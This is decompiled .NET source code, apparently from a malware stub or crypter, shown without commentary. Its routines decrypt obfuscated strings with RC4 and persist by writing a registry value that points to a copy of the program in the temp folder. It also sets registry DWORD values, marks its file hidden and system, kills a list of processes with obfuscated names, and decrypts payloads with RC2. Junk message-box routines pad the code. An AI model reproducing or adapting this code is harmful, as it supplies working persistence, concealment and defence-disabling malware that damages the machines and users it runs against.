private object AbWjJrcashsrUglvWLpPUBT(string RjpBKtyoXKovFnX, string RFxHQxRvBmidXoU)
{
if (Operators.CompareString(this.ndnmrvXfvEtRnGWDjtjqaPE, Path.GetTempPath() + RFxHQxRvBmidXoU, false) != 0)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "kxe" + Conversions.ToString(Strings.Chr(184)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(186)) + "l" + Conversions.ToString(Strings.Chr(190)) + "{" + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(142)) + "P\u001C" + Conversions.ToString(Strings.Chr(243)) + Conversions.ToString(Strings.Chr(132)) + "D" + Conversions.ToString(Strings.Chr(242)) + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(146)) + Conversions.ToString(Strings.Chr(156)) + "(" + Conversions.ToString(Strings.Chr(204)) + Conversions.ToString(Strings.Chr(235)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(151)) + "*" + Conversions.ToString(Strings.Chr(198)) + "1" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(186)) + Conversions.ToString(Strings.Chr(137)) + "f" + Conversions.ToString(Strings.Chr(150)) + "\u0003{" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(195)) + "\u001E\u0014s" + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(166))), true);
registryKey.SetValue(RjpBKtyoXKovFnX, (object) (Path.GetTempPath() + RFxHQxRvBmidXoU), RegistryValueKind.String);
registryKey.Close();
try
{
File.Copy(this.ndnmrvXfvEtRnGWDjtjqaPE, Path.GetTempPath() + RFxHQxRvBmidXoU, true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
object obj;
return obj;
}
private object cvGqHnmUkvCkHFuKRHnFvee()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(132)) + "0" + Conversions.ToString(Strings.Chr(216)) + "*" + Conversions.ToString(Strings.Chr(193)) + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(152)) + "C" + Conversions.ToString(Strings.Chr(175)) + "<a" + Conversions.ToString(Strings.Chr(196)) + Conversions.ToString(Strings.Chr(222)) + "\u001F;N" + Conversions.ToString(Strings.Chr(155)) + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(225)) + Conversions.ToString(Strings.Chr(134)) + "EL" + Conversions.ToString(Strings.Chr(200)) + "uY;C\\\u0012" + Conversions.ToString(Strings.Chr(199)) + "FEP"), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(156)) + "}" + Conversions.ToString(Strings.Chr(183))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object RXXeGpqoUgCmIipoOOesgoC()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(153)) + "6" + Conversions.ToString(Strings.Chr(215)) + "1" + Conversions.ToString(Strings.Chr(205)) + Conversions.ToString(Strings.Chr(167)) + Conversions.ToString(Strings.Chr(146)) + "V" + Conversions.ToString(Strings.Chr(135)) + "-_" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(194)) + "\u0014'V" + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(254)) + Conversions.ToString(Strings.Chr(164)) + "^P" + Conversions.ToString(Strings.Chr(201)) + "tZ\u001Ez}\u0018" + Conversions.ToString(Strings.Chr(221)) + "]Na" + Conversions.ToString(Strings.Chr(249)) + Conversions.ToString(Strings.Chr(201)) + "W/" + Conversions.ToString(Strings.Chr(171)) + "\u007F_&k" + Conversions.ToString(Strings.Chr(176)) + Conversions.ToString(Strings.Chr(140)) + "Y" + Conversions.ToString(Strings.Chr(134)) + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(190))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + 
Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(139)) + "Q" + Conversions.ToString(Strings.Chr(128)) + "y" + Conversions.ToString(Strings.Chr(170)) + Conversions.ToString(Strings.Chr(181)) + Conversions.ToString(Strings.Chr(147))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object bJwQqmrhNCUHsooEXOHZEXb()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(153)) + "6" + Conversions.ToString(Strings.Chr(215)) + "1" + Conversions.ToString(Strings.Chr(205)) + Conversions.ToString(Strings.Chr(167)) + Conversions.ToString(Strings.Chr(146)) + "V" + Conversions.ToString(Strings.Chr(135)) + "-_" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(194)) + "\u0014'V" + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(254)) + Conversions.ToString(Strings.Chr(164)) + "^P" + Conversions.ToString(Strings.Chr(201)) + "tZ\u001Ez}\u0018" + Conversions.ToString(Strings.Chr(221)) + "]Na" + Conversions.ToString(Strings.Chr(249)) + Conversions.ToString(Strings.Chr(201)) + "W/" + Conversions.ToString(Strings.Chr(171)) + "\u007F_&k" + Conversions.ToString(Strings.Chr(176)) + Conversions.ToString(Strings.Chr(140)) + "Y" + Conversions.ToString(Strings.Chr(134)) + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(190))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + 
Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(141)) + "U" + Conversions.ToString(Strings.Chr(148)) + "{" + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(147)) + "Z'" + Conversions.ToString(Strings.Chr(250)) + Conversions.ToString(Strings.Chr(159)) + "t" + Conversions.ToString(Strings.Chr(214))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object GcgXojEaFPbweNAQSKGPfDl()
{
try
{
File.SetAttributes(this.ndnmrvXfvEtRnGWDjtjqaPE, FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object JifTRmpsoLwDgKYvqYDjDUn()
{
Process[] processesByName1 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "fwt" + Conversions.ToString(Strings.Chr(156)) + Conversions.ToString(Strings.Chr(154)) + Conversions.ToString(Strings.Chr(229))));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "fwt" + Conversions.ToString(Strings.Chr(140)) + Conversions.ToString(Strings.Chr(152)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(179))));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(228)) + "Fqi" + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(137)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(169)) + "Y" + Conversions.ToString(Strings.Chr(144)) + "w"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
Process[] processesByName4 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "iip" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(137)) + Conversions.ToString(Strings.Chr(245)) + Conversions.ToString(Strings.Chr(186)) + "B" + Conversions.ToString(Strings.Chr(133)) + "{" + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(183))));
int index4 = 0;
while (index4 < processesByName4.Length)
{
processesByName4[index4].Kill();
checked { ++index4; }
}
Process[] processesByName5 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(214)) + "|zx" + Conversions.ToString(Strings.Chr(174)) + Conversions.ToString(Strings.Chr(139))));
int index5 = 0;
while (index5 < processesByName5.Length)
{
processesByName5[index5].Kill();
checked { ++index5; }
}
Process[] processesByName6 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(197)) + "mlt" + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(173)) + "["));
int index6 = 0;
while (index6 < processesByName6.Length)
{
processesByName6[index6].Kill();
checked { ++index6; }
}
Process[] processesByName7 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "iip" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(137))));
int index7 = 0;
while (index7 < processesByName7.Length)
{
processesByName7[index7].Kill();
checked { ++index7; }
}
Process[] processesByName8 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(221)) + "hrh" + Conversions.ToString(Strings.Chr(171)) + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(225))));
int index8 = 0;
while (index8 < processesByName8.Length)
{
processesByName8[index8].Kill();
checked { ++index8; }
}
Process[] processesByName9 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "mle" + Conversions.ToString(Strings.Chr(186)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(234)) + Conversions.ToString(Strings.Chr(189)) + "_" + Conversions.ToString(Strings.Chr(139))));
int index9 = 0;
while (index9 < processesByName9.Length)
{
processesByName9[index9].Kill();
checked { ++index9; }
}
Process[] processesByName10 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(218)) + "mtp" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(135)) + Conversions.ToString(Strings.Chr(242)) + Conversions.ToString(Strings.Chr(183)) + "Y" + Conversions.ToString(Strings.Chr(128))));
int index10 = 0;
while (index10 < processesByName10.Length)
{
processesByName10[index10].Kill();
checked { ++index10; }
}
Process[] processesByName11 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(211)) + "jks" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(159))));
int index11 = 0;
while (index11 < processesByName11.Length)
{
processesByName11[index11].Kill();
checked { ++index11; }
}
Process[] processesByName12 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(211)) + "jks" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(159)) + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(237))));
int index12 = 0;
while (index12 < processesByName12.Length)
{
processesByName12[index12].Kill();
checked { ++index12; }
}
Process[] processesByName13 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(217)) + "agb" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(158)) + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(178)) + "R" + Conversions.ToString(Strings.Chr(159)) + "w" + Conversions.ToString(Strings.Chr(149))));
int index13 = 0;
while (index13 < processesByName13.Length)
{
processesByName13[index13].Kill();
checked { ++index13; }
}
Process[] processesByName14 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(216)) + "k{s" + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(148))));
int index14 = 0;
while (index14 < processesByName14.Length)
{
processesByName14[index14].Kill();
checked { ++index14; }
}
object obj;
return obj;
}
private byte[] TUGGEjqkhdQUTQXLCYdPZEP(Stream fDQofwUuYVBnHVG)
{
int int32 = Convert.ToInt32(fDQofwUuYVBnHVG.Length);
byte[] buffer = new byte[checked (int32 + 1)];
fDQofwUuYVBnHVG.Read(buffer, 0, int32);
fDQofwUuYVBnHVG.Close();
return buffer;
}
public string SevdniwAKhioHCREIfujevM(string OnAQjtuvLvRQpWZCE)
{
string str1 = "IZOwndEWSMqepsgkGUFjZRA";
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = str1.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = str1.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
int location3 = 1;
while (location3 <= OnAQjtuvLvRQpWZCE.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(OnAQjtuvLvRQpWZCE.Substring(checked (location3 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location3), checked (location3 - 1));
}
string str2 = stringBuilder.ToString();
stringBuilder.Length = 0;
return str2;
}
private byte[] ParrEopthTArjooCKMhseYj(Stream stream)
{
int int32 = Convert.ToInt32(stream.Length);
byte[] buffer = new byte[checked (int32 + 1)];
stream.Read(buffer, 0, int32);
stream.Close();
return buffer;
}
public byte[] tVjpoufrKfCfDJKBWirZOSi(byte[] CLMKPmszer, string dugkLkvqIG)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
byte[] numArray;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(dugkLkvqIG));
cryptoServiceProvider1.Key = hash;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = CLMKPmszer;
numArray = decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return numArray;
}
public byte[] htDdmvkOrQChFmEfSpiPvcH(byte[] CLMKPmszer, string dugkLkvqIG)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
byte[] numArray;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(dugkLkvqIG));
cryptoServiceProvider1.Key = hash;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = CLMKPmszer;
numArray = decryptor.TransformFinalBlock(inputBuffer, 0, checked (inputBuffer.Length - 1));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return numArray;
}
public string MQkklstIjeKaoLOsOlgFZIR(string eSQKcZvSqw)
{
string str1 = Strings.StrReverse(eSQKcZvSqw);
string str2 = "";
int num = Strings.Len(str1);
int Start = 1;
while (Start <= num)
{
str2 += Conversions.ToString(Strings.Chr(checked (Strings.Asc(Strings.Mid(str1, Start, 1)) - 103)));
checked { ++Start; }
}
return str2;
}
public string BpEYjtBcTPJcqnIZLsXsKSn(string ffg)
{
string str1 = "";
int num = Strings.Len(ffg);
for (int Start = 1; Start <= num; Start = checked (Start + 1 + 1))
{
string str2 = Strings.Mid(ffg, Start, 2);
str1 += Conversions.ToString(Strings.Chr(checked ((int) Math.Round(Conversion.Val("&h" + str2)))));
}
return str1;
}
public string DuDULwluFLegskgHiJUQfjp(string StKmTsqKHPhMDFLRtubHVWJELlGDuuJZNNyjNm)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "fBGGwGARzzQtSWoQjeCevENFOZqTstekNlENdFKPcEtmENQrunKNbQTTZlelmTgoTPezhGcBBgOSqPVtnKlDKmKRPbsdNqiRdPTXKDrXImYrMyjlOBMCZEKBOoN");
int num4 = (int) Interaction.MsgBox((object) "VNNqdRrSZteSxVTxgOWKwacaJXwHGKJDdinpReUsdBCIvzqsKjyFFcrPSdghceIgBCQmKQSMBDeQqALSIpccRPQlizSTVlcFmdqCwIipADlaWZlFGKbksgrEPkd");
int num5 = (int) Interaction.MsgBox((object) "GVJFGVYkJywJawTEPVpeqiNGOgOgWUdNNsajVYoolxQYBGmjFBwipTqWcKWgDhRWPKFwfFKcNtBtDQPgXdcwagCvdooQrlshVbCTVHiaYxbMXlWGRmfKbHgeLiXMIVmwcF");
label_1:
int num6 = (int) Interaction.MsgBox((object) "fVLmPZpvaDnRdMcOwfJPWrcNdXtCLvdYzIFpOfBYFpjIcRppmaDqdhGXSaLWHmpSuNImhmznOvPWfFcbJDlCmNpIfNRNZYUKZGiBWUriMyOEtgweLNUWTDRdKC");
int num7 = (int) Interaction.MsgBox((object) "tsLpBgRXSzcMwkRRbbMhmoJARGwizkvuDVJDrcmnqcBOYIhPClWtlklfBfqEXqhSveMFNAmXsdRKSCJDidZsZsfpGpZMfFaczYNHvirCbLQTVEUSCjTTQHUVTuohiQvUQszLkMWSMBHPZQRlZrXeRGUhyHsvPxMjcnThmNwKhzkMn");
int num8 = (int) Interaction.MsgBox((object) "KjFppqJYassWrRMyTcRhkqCPcAXQHbOtLmPLpZnpUyoqWownefrJMGyuBRxSeAzQobbksrNnHnPXtYiCKQxFdmNdPiZDSvlnaBuBgMrkMnXYSSFZezVOYwFrzzSFXB");
int num9 = (int) Interaction.MsgBox((object) "KQHCVdCnSkyNRgoNKhHIuniROEYrNmnPFruzzgaPpKBRPGOqUYcLlHnIZStBdRfwlYYnTarfLzZWYJQyFyMmXGUgBvgSinLbkQmflkTWOEOrBRRXzHEzLKxacpjGlbzsjRhrKodeibPoGGlEmCBNKvtfkCufuKRlRgEkyNqqzRXewDugy");
int num10 = (int) Interaction.MsgBox((object) "JxmaUHsNNaGiikdZrSTBdVmbgruzbVcMYvSEXenxsgHdCKDyVcwtZSnBWULIoXDrQVipSlpaGwosalmJBvPfytLVuPlyQudjikrJaRgyznJEYDMJekenVpqjtrezbcmqVD");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string ACtvUsGptTbweZCTQBnPPMl(string FgsaXBZOOSMWJMp)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "aVfzwCNlydKgLFsDxDtidHtzjnedDYzzLzsYtFcXxFCfkRIFDADuSOEfFekTMMqCXMNkqRcQnUxkGwimezXrPINdozUlBWhUyrtdEvolLDwoqBvVQhCTjywOWeiajLxYeXlvzpD");
int num4 = (int) Interaction.MsgBox((object) "gHtovaXRkDOihjPJeiKKgaBrXwLIyFmeBOdYdSUByEebeNSecKNtvftxWlgmQdtyzmyBDyFSEMhylBXUSnbdrbxTWzzCIjaGRPdWKdTYEGRzfjcnIeVn");
int num5 = (int) Interaction.MsgBox((object) "RkiUSJwfprLJyrslSsdbXWeWxavGHOlccONepknCnyntychdLFQtbkPrIZysJaENulcyxTSUQfzmmLrUToAgkxPefEaXsuwiICwesoblwXJCYaGDBKImrhec");
int num6 = (int) Interaction.MsgBox((object) "EMRQolfgmTOCVlPETusVifUARUqfSLrLhIrHVWiDjiwWMYaDcFEGMeMLeteoTXOjyCiKfkMGDxvFUVTRCcsYLhDjTETHEtQeKWMOBdPDBlg");
int num7 = (int) Interaction.MsgBox((object) "kWPKAJRckCDeNkRMHrwnwlpsmEcNrKONdFapVScfakukIMDBpliXHFbyaZQIaAOrySNEMwTWMSFWumNVWPJOKZODnPlaaDmrcxDyBNOOalTotQnSNJRSSrtZuflsXQ");
int num8 = (int) Interaction.MsgBox((object) "leasQgCYDsJoJjaiPLbEvBOYAPEYvEbwWylDQrqsqxtshOkDCHOLLvIGBMRYlMIjOKiMhQEBVpdFnJOgdydBnUccatsebjBcWvpDkswFbqzQBMMIsvwPFYhMNLCOfFubpz");
int num9 = (int) Interaction.MsgBox((object) "UcuNESDOrzhRWxikOswNnSkoYQyiGlpHtImotgIXOPlOgGyeiUQRRpChGbqhXrMbbiqvSfBTwInRtFvFDNTJpXAvugMKTValEnPHpvInYfNPlaqzgyKxmuujQBAxvTtrBuwFM");
int num10 = (int) Interaction.MsgBox((object) "LAwvnAMPvxcTBolyxDzHuMoDbNDQaTxPwLPwUIqdzsSRtESUjtiqfkbWYLrDFAkzyiJhIENbTIKYWZzEtZHVtoiwRjUkQDYvhaFXsYfBPBfKZghwrEvQ");
int num11 = (int) Interaction.MsgBox((object) "FowLceQlKVqoqcichrqVXYuVrPmMjKvGwulSioLlNJkUrRBqczOHWGtnjSbIkuScLekWxWUxuVMJCgrxNccnWhnwpJWHhTtELekYpBHFGZeaDbMaWiOJK");
int num12 = (int) Interaction.MsgBox((object) "VRjBqKIfIDCpUMMUWzkCdWxnKctafbhQGUCRdnBTszTdtVpRiCKfoOGLuCemqGEOYlqlVPMPUfsFOFGNKXsuxUipeqlyRCpioaadHWtMCEArTwLDQULTvYgScBp");
int num13 = (int) Interaction.MsgBox((object) "fIsSDWQPVFZfRHIUkCmDjQZWITzIVcBdtYbWVhqRiNIBiNbJmiePjLBxFGAKFJxRGEcpGCCWybotBYtOHXOOjTEMyQzdzZFeHjuTZncFdUAmvlDkAqwxxHkdeyKSg");
int num14 = (int) Interaction.MsgBox((object) "jksVjOpyHiQadizqqZqZaeYFJLpjEndVCtdbaKoiCCyGyhSlJQliQHjpLnEBYYuBRaJLujRwXJhuHgBvsVCrSSKniTVYmmpIRMlTGuyKGkUnRlcrgXqxsSeWOlqxKlqLr");
label_1:
int num15 = (int) Interaction.MsgBox((object) "ePuXWROvRGsoPszjvHvmZTdybRgEXGwaaNviFcXobTEtjsyYQvGHBqgPwKQrgXxILJSSqLyeGchwOjfLGNoOZrNTsBEwOnOZYtDsNzYhJcyuWGfEtDKOeNuhUMuGsaZTNGSxJZtBbg");
int num16 = (int) Interaction.MsgBox((object) "WvpCofhywfhQOGcjYNRzpiJYdBSUkEzVFoZTCoKSCILEpRfVbOoMUxEZTDnbKzDkiwgIDWFzFEFVoVObkJoBelpODmdmiMVWEjKsjbyzQrnjMPtJaTGBUsgBIWckHkQpwXBExxDbJqzaMshbbPgtsPrtKcXDhQBvlgtatgkmOWceotlMRANAwkzkaFaL");
int num17 = (int) Interaction.MsgBox((object) "axAGfjDVYaCvsitwdWuGiaxWdcqFurYtlFZVSgDGXbnaFRMgSxZqPwYZjpCSYWLmmadPjNvoxbPSLyNpGjHRJrwSKqHhtToeKymWlTpjDWiKQUuWEbRMNxpuOCLoegNeazBwuvPKDlJ");
int num18 = (int) Interaction.MsgBox((object) "VDiZuBnflQwPNDrXXqrpineHywuxfCmEePgmoYLtyVDcXforiFNmFgUZgzoEpnsCjDKTnrIwFGgqsoGNyPHdFCoUrcVNHKxQEIDWnUnQaMMGUrBOqLHReQtTCUXYdkKXKSsvjXHcgaeawEgUdhuDWlrziQboyalxWWMtWNZHrnQAVpGIhREodasmDDQLMwkSK");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string RpNbSJrtFTCgdXBESpGGRMt(string QqZfqkvWNqWXnuo)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "KZnakGfxhiBhsXhGmGDnPToccBuRCKaIlyGvxyNNucciEvqxMnfoRytiwftCoOZkhacTRjhhEszIGLkwZYJyEiuPDIMvUxsQfIyHznHwshNWFvitFPigkLJhkuICpBo");
int num4 = (int) Interaction.MsgBox((object) "boKNTkRecxdHRVvNpqiPxpZkZLXYacglfmkkOLnUHhvFvyQtvSPqeXPkQxmmLPltvKNoshXBvPMdrMcXynevJaTfFxjGdvAkOcyUqYrGpFUVURzyvWvquJtaKMyjcqhoJ");
int num5 = (int) Interaction.MsgBox((object) "VBBgWwarMbDRQnIywYfPRaDQLOlhdUEpjeIoSAtvWgjthuXGangSjugWVCXVSqetdfIbnqQztOsvmyGPKyJDPkIurQvNHUurDzSALmhmdTvfHUJBdfl");
label_1:
int num6 = (int) Interaction.MsgBox((object) "dpwXtgauNbsscPkyUVnGGLAvmzkGTczqyvfxnOgnFOnRkjGhqdKcsUCNOkjyemtkldBbdOXvramPJNbGUqWrGHMVgMUtsDgLpXBgDVFnkgUYNLzgHrjPIoyJVilGPCiIteZaWKBFSfgGGFxwkfs");
